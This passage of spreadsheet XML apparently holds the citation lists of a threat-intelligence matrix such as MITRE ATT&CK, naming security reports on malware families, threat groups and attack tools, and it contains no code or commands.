    <t>(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Google EXOTIC LILY March 2022),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Microsoft Phosphorus Mar 2019),(Citation: SANS Windshift August 2018),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: FireEye APT34 July 2019),(Citation: ESET Lazarus Jun 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Google TAG Lazarus Jan 2021),(Citation: Lookout Dark Caracal Jan 2018),(Citation: FireEye Operation Saffron Rose 2013),(Citation: SecureWorks Mia Ash July 2017),</t>
  </si>
  <si>
    <t>(Citation: trendmicro xcsset xcode project 2020),(Citation: Apple Developer Doco Hardened Runtime)</t>
  </si>
  <si>
    <t>,(Citation: TechNet Secure Boot Process),(Citation: TCG Trusted Platform Module)</t>
  </si>
  <si>
    <t>(Citation: FireEye BOOTRASH SANS),(Citation: ESET Sednit Part 3),(Citation: Microsoft FinFisher March 2018),(Citation: Microsoft WhisperGate January 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: FinFisher Citation),(Citation: FireEye APT41 Aug 2019),(Citation: Cybereason WhisperGate February 2022),(Citation: Novetta Blockbuster Destructive Malware),(Citation: ESET Carberp March 2012),(Citation: Novetta Blockbuster),(Citation: Mandiant M Trends 2016),(Citation: FireEye Bootkits),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Eclypsium Trickboot December 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: TechNet Secure Boot Process),(Citation: TCG Trusted Platform Module)</t>
  </si>
  <si>
    <t>(Citation: NCSC Cyclops Blink February 2022),(Citation: Kaspersky Equation QA),</t>
  </si>
  <si>
    <t>,(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification),(Citation: Cisco IOS Software Integrity Assurance - Change Control),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot)</t>
  </si>
  <si>
    <t>(Citation: Ge 2011),(Citation: ESET LoJax Sept 2018),(Citation: TrendMicro Hacking Team UEFI),(Citation: ESET LoJax Sept 2018),(Citation: Intel Hardware-based Security Technologies),(Citation: TCG Trusted Platform Module)</t>
  </si>
  <si>
    <t>,(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification),(Citation: Cisco IOS Software Integrity Assurance - Change Control),(Citation: Cisco IOS Software Integrity Assurance - Image File Integrity),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot)</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: Talos ZxShell Oct 2014),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Secureworks Karagany July 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: wardle evilquest parti),(Citation: Cybereason Astaroth Feb 2019),(Citation: NCCGroup RokRat Nov 2018),(Citation: Dragos EKANS),(Citation: Scarlet Mimic Jan 2016),(Citation: Cybereason Valak May 2020),(Citation: Trend Micro njRAT 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Baumgartner Naikon 2015),(Citation: BlackBerry Bahamut),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Unit 42 Nokki Oct 2018),(Citation: Lazarus RATANKBA),(Citation: Unit42 Sofacy Dec 2018),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure BlackEnergy 2014),(Citation: Talos GravityRAT),(Citation: TrendMicro EarthLusca 2022),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: Volexity SolarWinds),(Citation: Lazarus APT January 2022),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Microsoft FinFisher March 2018),(Citation: Zscaler Kasidet),(Citation: Unit 42 Gamaredon February 2022),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Trusteer Carberp October 2010),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: evolution of pirpi),(Citation: NCC Group APT15 Alive and Strong),(Citation: Fysbis Dr Web Analysis),(Citation: Proofpoint Azorult July 2018),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: Kaspersky Turla),(Citation: FireEye FiveHands April 2021),(Citation: MSTIC FoggyWeb September 2021),(Citation: Medium KONNI Jan 2020),(Citation: Symantec Linfo May 2012),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: TrendMicro Ursnif Mar 2015),(Citation: RATANKBA),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Volexity PowerDuke November 2016),(Citation: Fortinet Agent Tesla June 2017),(Citation: Symantec Pasam May 2012),(Citation: Talos Oblique RAT March 2021),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: FireEye Hacking Team),(Citation: objsee mac malware 2017),(Citation: IBM Ransomware Trends September 2020),(Citation: Trustwave Pillowmint June 2020),(Citation: Trend Micro Ransomware February 2021),(Citation: Talos Promethium June 2020),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Avira Mustang Panda January 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: GitHub Pupy),(Citation: McAfee GhostSecret),(Citation: Microsoft Tasklist),(Citation: Palo Alto Networks BBSRAT),(Citation: Trend Micro KillDisk 2),(Citation: Palo Alto Comnie),(Citation: CISA SoreFang July 2016),(Citation: Trend Micro Waterbear December 2019),(Citation: Profero APT27 December 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Bisonal Mar 2020),(Citation: Fortinet Diavol July 2021),(Citation: CyberBit Dtrack),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: ESET LoudMiner June 2019),(Citation: FireEye Ransomware Feb 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: Symantec Inception Framework March 2018),(Citation: Kaspersky Turla Aug 2014),(Citation: Novetta Winnti April 2015),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Symantec Shuckworm January 2022),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: ESET BlackEnergy Jan 2016),(Citation: Intezer Doki July 20),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: CrowdStrike Putter Panda),(Citation: Secure List Bad Rabbit),(Citation: FoxIT Wocao December 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Rancor Unit42 June 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: JPCert TSCookie March 2018),(Citation: Symantec Bumblebee June 2022),(Citation: Securelist Dtrack),(Citation: Anomali Rocke March 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Unit42 BabyShark Feb 2019),(Citation: Accenture Dragonfish Jan 2018),(Citation: FireEye APT37 Feb 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: BiZone Lizar May 2021),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ESET Zebrocy Nov 2018),(Citation: Check Point APT35 CharmPower January 2022),(Citation: cobaltstrike manual),(Citation: ESET Sednit Part 1),(Citation: Talos Frankenstein June 2019),(Citation: Mcafee Clop Aug 2019),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Trend Micro Skidmap),(Citation: Proofpoint TA505 October 2019),(Citation: Symantec Volgmer Aug 2014),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: CrowdStrike Ryuk January 2019),(Citation: Kaspersky Winnti April 2013),(Citation: FinFisher Citation),(Citation: Trend Micro Iron Tiger April 2021),(Citation: NTT Security Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: XAgentOSX 2017),(Citation: Cisco Talos Intelligence Group),(Citation: ESET Zebrocy May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Talos ROKRAT),(Citation: Check Point Meteor Aug 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Mandiant APT1),(Citation: Talos Group123),(Citation: Securelist APT10 March 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Aqua Kinsing April 2020),(Citation: FireEye APT30),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: ClearSky MuddyWater June 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Symantec Orangeworm April 2018),(Citation: TrendMicro macOS Dacls May 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: FireEye APT17),(Citation: Malwarebytes DarkComet March 2018),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: ESET Machete July 2019),(Citation: McAfee Honeybee),(Citation: FireEye APT34 Dec 2017),(Citation: ATT Sidewinder January 2021),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Check Point Warzone Feb 2020),(Citation: Novetta Blockbuster Loaders),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Threatpost Lizar May 2021),(Citation: Unit 42 Kazuar May 2017),(Citation: Kaspersky Poseidon Group),(Citation: Unit 42 Bisonal July 2018),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Imminent Unit42 Dec2019),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Securelist MuddyWater Oct 2018),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Zscaler Higaisa 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 ),(Citation: ESET Carbon Mar 2017),(Citation: McAfee Sharpshooter December 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Symantec Dragonfly),(Citation: ESET DazzleSpy Jan 2022),(Citation: Fidelis Turbo),(Citation: Antiy CERT Ramsay April 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: Trend Micro TeamTNT),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Kaspersky TajMahal April 2019),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: McAfee Cuba April 2021),(Citation: ESET Dukes October 2019),(Citation: GDATA Zeus Panda June 2017),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: FireEye EPS Awakens Part 2),(Citation: Novetta Blockbuster),(Citation: AlienVault Sykipot 2011),(Citation: F-Secure The Dukes),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: DustySky),(Citation: Kaspersky Lyceum October 2021),(Citation: ASEC Emotet 2017),(Citation: Talos NavRAT May 2018),(Citation: Symantec W32.Duqu),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Novetta-Axiom),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Symantec Frutas Feb 2013),(Citation: Sofacy Komplex Trojan),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Kaspersky MoleRATs April 2019),(Citation: Trend Micro IXESHE 2012),(Citation: Bitdefender Trickbot March 2020),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: CIRCL PlugX March 2013),(Citation: FOX-IT May 2016 Mofang),(Citation: Palo Alto OilRig May 2016),(Citation: ATT QakBot April 2021),(Citation: Unit 42 CARROTBAT January 2020),(Citation: ESET PipeMon May 2020),(Citation: FireEye APT38 Oct 2018),(Citation: Palo Alto menuPass Feb 2017),(Citation: ASERT Donot March 2018),(Citation: FireEye CARBANAK June 2017),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: CarbonBlack Conti July 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: FireEye Clandestine Fox),(Citation: GitHub PowerSploit May 2012),(Citation: Alperovitch 2014),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: ESET InvisiMole June 2020),(Citation: McAfee Babuk February 2021),(Citation: Symantec Hydraq Jan 2010),(Citation: ESET Trickbot Oct 2020),(Citation: McAfee Maze March 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: GitHub PoshC2),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: cobaltstrike manual),(Citation: Cyble Egregor Oct 2020),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Gh0stRAT ATT March 2019),(Citation: Gigamon Berserk Bear October 2021),(Citation: Kroll Qakbot June 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Kaspersky StoneDrill 2017),(Citation: Talos NavRAT May 2018),(Citation: Microsoft SIR Vol 21),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Trend Micro Qakbot May 2020),(Citation: Talos Group123),(Citation: Joe Sec Trickbot),(Citation: Threatpost New Op Sharpshooter Data March 2019),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye APT41 Aug 2019),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Fortinet Remcos Feb 2017),(Citation: Red Canary NETWIRE January 2020),(Citation: Malwarebytes Dyreza November 2015),(Citation: JPCert BlackTech Malware September 2019),(Citation: Trend Micro Tick November 2019),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET Gazer Aug 2017),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Symantec Wiarp May 2012),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: Check Point Warzone Feb 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: GitHub Sliver C2),(Citation: NCSC Joint Report Public Tools),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: Unit42 Emissary Panda May 2019),(Citation: Trend Micro Qakbot December 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: BiZone Lizar May 2021),(Citation: F-Secure Sofacy 2015),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: ESET InvisiMole June 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: ESET Attor Oct 2019),(Citation: Symantec Dragonfly),(Citation: Group IB Silence Sept 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: McAfee REvil October 2019),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020),(Citation: Proofpoint Bumblebee April 2022),(Citation: Prevx Carberp March 2011),(Citation: Bitdefender FIN8 July 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: IBM IcedID November 2017),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: CyberBit Early Bird Apr 2018),</t>
  </si>
  <si>
    <t>(Citation: Picus Emotet Dec 2018),(Citation: Kaspersky TajMahal April 2019),(Citation: Talos ZxShell Oct 2014),(Citation: Proofpoint TA505 October 2019),(Citation: Camba RARSTONE),(Citation: Lotus Blossom Jun 2015),(Citation: GitHub Pupy),(Citation: FinFisher Citation),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Eset Ramsay May 2020),(Citation: ESET Carberp March 2012),(Citation: Accenture MUDCARP March 2019),(Citation: ESET ComRAT May 2020),(Citation: AlienVault Sykipot 2011),(Citation: Medium Metamorfo Apr 2020),(Citation: TrendMicro Netwalker May 2020),(Citation: Cybereason Conti Jan 2021),(Citation: Proofpoint Bumblebee April 2022),(Citation: Github Rapid7 Meterpreter Elevate),(Citation: Talos Cobalt Strike September 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: ESET Turla Mosquito May 2018),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Symantec W32.Duqu),(Citation: Lotus Blossom Dec 2015),(Citation: Lazarus RATANKBA),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: FireEye Poison Ivy),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: US-CERT Emotet Jul 2018),(Citation: Airbus Derusbi 2015),(Citation: Lazarus APT January 2022),(Citation: ESET Gelsemium June 2021),(Citation: Microsoft FinFisher March 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CISA ComRAT Oct 2020),(Citation: Symantec Dyre June 2015),(Citation: Github Koadic),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: TrendMicro Taidoor),(Citation: Sophos Maze VM September 2020),(Citation: IBM MegaCortex),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET PipeMon May 2020),(Citation: CrowdStrike Putter Panda),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Symantec Darkmoon Aug 2005),(Citation: Symantec Bumblebee June 2022),(Citation: IBM TA505 April 2020),(Citation: ESET Sednit Part 3),(Citation: ESET Carbon Mar 2017),(Citation: PowerSploit Documentation),(Citation: Accenture Dragonfish Jan 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: BiZone Lizar May 2021),(Citation: CopyKittens Nov 2015),(Citation: GitHub PowerSploit May 2012),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: RATANKBA),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: McAfee Maze March 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: MalwareTech Power Loader Aug 2013),(Citation: WeLiveSecurity Gapz and Redyms Mar 2013),(Citation: ESET Recon Snake Nest),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2020),</t>
  </si>
  <si>
    <t>(Citation: BiZone Lizar May 2021),(Citation: GDATA Zeus Panda June 2017),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET GreyEnergy Oct 2018),(Citation: ESET InvisiMole June 2020),(Citation: Talos Rocke August 2018),(Citation: FireEye CARBANAK June 2017),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lab SynAck May 2018),(Citation: Symantec Leafminer July 2018),(Citation: NCC Group Team9 June 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Cybereason Bazar July 2020),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Palo Alto Networks BBSRAT),(Citation: Cybereason Astaroth Feb 2019),(Citation: S2 Grupo TrickBot June 2017),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Cisco Ukraine Wipers January 2022),(Citation: EFF Manul Aug 2016),(Citation: Profero APT27 December 2020),(Citation: Talos Lokibot Jan 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: NCC Group Team9 June 2020),(Citation: Symantec W32.Duqu),(Citation: Accenture Hogfish April 2018),(Citation: OilRig New Delivery Oct 2017),(Citation: FireEye Ursnif Nov 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit42 Azorult Nov 2018),(Citation: Trend Micro Totbrick Oct 2016),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Malwarebytes SmokeLoader 2016),(Citation: Securelist LuckyMouse June 2018),(Citation: ATT QakBot April 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: CheckPoint Bandook Nov 2020),(Citation: Lookout Dark Caracal Jan 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cymmetria Patchwork),(Citation: Securelist Dtrack),(Citation: Cyberreason Anchor December 2019),(Citation: Microsoft Totbrick Oct 2017),(Citation: Microsoft Dofoil 2018),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Forcepoint Monsoon),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
    <t>(Citation: Secureworks Karagany July 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: Trend Micro Waterbear December 2019),(Citation: ESET Gazer Aug 2017),</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Ursnif Mar 2015),(Citation: FireEye Ursnif Nov 2017),(Citation: TrendMicro PE_URSNIF.A2),</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: MalwareBytes Ngrok February 2020),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Dragos Crashoverride 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Kaspersky Lyceum October 2021),(Citation: Symantec W32.Duqu),(Citation: Group IB Cobalt Aug 2017),(Citation: Talos Cobalt Group July 2018),(Citation: Trend Micro Ngrok September 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Mythc Documentation),(Citation: FireEye FIN6 April 2016),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: Unit 42 Playbook Dec 2017),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Cyware Ngrok May 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: FireEye APT34 July 2019),(Citation: cobaltstrike manual),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: FireEye Maze May 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Talos ZxShell Oct 2014),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub PoshC2),(Citation: Proofpoint TA505 October 2019),(Citation: MalwareBytes Ngrok February 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Riskiq Remcos Jan 2018),(Citation: Zdnet Ngrok September 2018),(Citation: Volexity Patchwork June 2018),(Citation: ESET Windigo Mar 2014),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Talos Bisonal Mar 2020),(Citation: ESET Telebots Dec 2016),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: FireEye APT41 Aug 2019),(Citation: Checkpoint Dridex Jan 2021),(Citation: JPCert PLEAD Downloader June 2018),(Citation: Red Canary NETWIRE January 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: JPCert BlackTech Malware September 2019),(Citation: US-CERT HARDRAIN March 2018),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: US-CERT TYPEFRAME June 2018),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: Securelist fileless attacks Feb 2017),(Citation: Kaspersky Adwind Feb 2016),(Citation: Check Point Warzone Feb 2020),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: NCSC Joint Report Public Tools),(Citation: RedCanary Mockingbird May 2020),(Citation: Microsoft POLONIUM June 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: NJCCIC Ursnif Sept 2016),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Symantec Vasport May 2012),(Citation: US-CERT BADCALL),(Citation: Operation Quantum Entanglement),(Citation: Crowdstrike DNC June 2016),(Citation: GitHub QuasarRAT),(Citation: Dell Dridex Oct 2015),(Citation: Check Point Pay2Key November 2020),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: FireEye SMOKEDHAM June 2021),(Citation: Mythc Documentation),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Mandiant No Easy Breach),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: FireEye Operation Double Tap),(Citation: ESET InvisiMole June 2018),(Citation: FireEye APT10 April 2017),(Citation: BitDefender Chafer May 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Symantec MuddyWater Dec 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Kaspersky Regin),(Citation: Cybereason Soft Cell June 2019),(Citation: Bitdefender Trickbot C2 infra Nov 2020),(Citation: TrendMicro macOS Dacls May 2020),(Citation: Mythc Documentation),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: Bitdefender APT28 Dec 2015),(Citation: Novetta Winnti April 2015),(Citation: FOX-IT May 2016 Mofang),(Citation: Trend Micro Muddy Water March 2021),(Citation: ESET Okrum July 2019),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: TrendMicro Tonto Team October 2020),(Citation: Kaspersky QakBot September 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET InvisiMole June 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Group IB Silence Sept 2018),(Citation: FireEye APT10 Sept 2018),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: ESET Dukes October 2019),(Citation: BitDefender Chafer May 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: NSA/FBI Drovorub August 2020),(Citation: Kaspersky ProjectSauron Blog),(Citation: Symantec W32.Duqu),(Citation: Novetta-Axiom),(Citation: ESET Sednit Part 2),(Citation: FireEye APT30),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ClearkSky Fox Kitten February 2020),(Citation: Mythc Documentation),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Novetta Winnti April 2015),(Citation: FireEye APT39 Jan 2019),(Citation: Symantec RAINDROP January 2021),(Citation: FoxIT Wocao December 2019),(Citation: Zscaler Higaisa 2020),(Citation: Accenture HyperStack October 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: cobaltstrike manual),(Citation: Check Point Pay2Key November 2020),(Citation: Talos TinyTurla September 2021),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: synack 2016 review),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Mandiant No Easy Breach),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: ESET GreyEnergy Oct 2018),(Citation: NCSC CISA Cyclops Blink Advisory February 2022),(Citation: Dragos Crashoverride 2017),(Citation: ESET Kobalos Jan 2021),(Citation: Checkpoint Dridex Jan 2021),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Symantec Inception Framework March 2018),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: SecureWorks WannaCry Analysis),(Citation: Unit 42 Siloscape Jun 2021),(Citation: FoxIT Wocao December 2019),(Citation: ESET Kobalos Feb 2021),(Citation: NJCCIC Ursnif Sept 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Dingledine Tor The Second-Generation Onion Router),(Citation: Bitdefender StrongPity June 2020),(Citation: ESET Attor Oct 2019),(Citation: MSTIC Nobelium Oct 2021),(Citation: objsee mac malware 2017),</t>
  </si>
  <si>
